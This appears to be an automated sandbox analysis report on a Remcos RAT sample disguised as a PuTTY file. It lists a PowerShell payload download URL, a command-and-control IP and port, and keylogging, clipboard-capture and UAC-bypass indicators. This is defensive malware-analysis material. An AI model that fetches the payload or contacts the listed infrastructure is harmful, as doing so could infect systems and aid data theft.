Source: PuttyTest777.pif, 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_68e230b9-9

Source: unknown

HTTPS traffic detected: 192.254.232.209:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041A01B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040B28E
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_0040838E
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_004087A0
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00407848
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004068CD FindFirstFileW,FindNextFileW,	17_2_004068CD
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040AA71
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00417AAB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040AC78

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406D28

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 4x nop then jmp 06F38C7Dh		3_2_06F38FA4
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 4x nop then jmp 06D27F0Dh		12_2_06D28234

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 204.10.160.230

Source: global traffic

TCP traffic: 192.168.2.4:49734 -> 204.10.160.230:7983

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 192.254.232.209 192.254.232.209
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 204.10.160.230 204.10.160.230

Source: Joe Sandbox View

ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /zti/hot.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: remisat.com.uyConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

17_2_0041936B

Source: global traffic	HTTP traffic detected: GET /zti/hot.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: remisat.com.uyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: remisat.com.uy
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000002.00000002.1690034857.000001CC8160C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81610000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe.3.dr, PuttyTest777.pif.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000002.00000002.1690034857.000001CC8160C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81610000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe.3.dr, PuttyTest777.pif.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: svchost.exe, 00000004.00000002.3309735354.0000016FF0E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0C08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0C08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0C08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0C3D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, HODoCxSdp.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: PuttyTest777.pif, 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp2
Source: PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: powershell.exe, 00000002.00000002.1713102823.000001CC90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1690034857.000001CC8160C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81610000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe.3.dr, PuttyTest777.pif.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1690034857.000001CC815E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://remisat.com.uy
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80001000.00000004.00000800.00020000.00000000.sdmp, PuttyTest777.pif, 00000003.00000002.1744085005.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe, 0000000C.00000002.1781886454.0000000002844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0CB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0CB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1713102823.000001CC90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1690157380.0000016FF0CB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.1690034857.000001CC81351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remisat.com.uy
Source: powershell.exe, 00000002.00000002.1690034857.000001CC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC80233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remisat.com.uy/zti/hot.exe
Source: powershell.exe, 00000002.00000002.1690034857.000001CC8160C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1690034857.000001CC81610000.00000004.00000800.00020000.00000000.sdmp, HODoCxSdp.exe.3.dr, PuttyTest777.pif.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 192.254.232.209:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000

17_2_00409340

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

17_2_0040A65A

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

17_2_00414EC1

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

17_2_0040A65A

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

17_2_00409468

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0041A76C SystemParametersInfoW,

17_2_0041A76C

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

17_2_00414DB4

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B870DF0	2_2_00007FFD9B870DF0
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F38AC8	3_2_06F38AC8
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F30040	3_2_06F30040
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F38AC8	3_2_06F38AC8
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F347C8	3_2_06F347C8
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F32CB8	3_2_06F32CB8
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F33528	3_2_06F33528
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F38AB9	3_2_06F38AB9
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F330F0	3_2_06F330F0
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F30006	3_2_06F30006
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F3B990	3_2_06F3B990
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F35178	3_2_06F35178
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Code function: 3_2_06F35168	3_2_06F35168
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D27D58	12_2_06D27D58
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D20040	12_2_06D20040
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D247C8	12_2_06D247C8
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D247B7	12_2_06D247B7
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D2ACE0	12_2_06D2ACE0
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D22CB3	12_2_06D22CB3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D22CB8	12_2_06D22CB8
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D27D4F	12_2_06D27D4F
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D23528	12_2_06D23528
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D230F0	12_2_06D230F0
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D2003B	12_2_06D2003B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D27D58	12_2_06D27D58
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D25173	12_2_06D25173
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 12_2_06D25178	12_2_06D25178
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00425152	17_2_00425152
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00435286	17_2_00435286
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004513D4	17_2_004513D4
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0045050B	17_2_0045050B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00436510	17_2_00436510
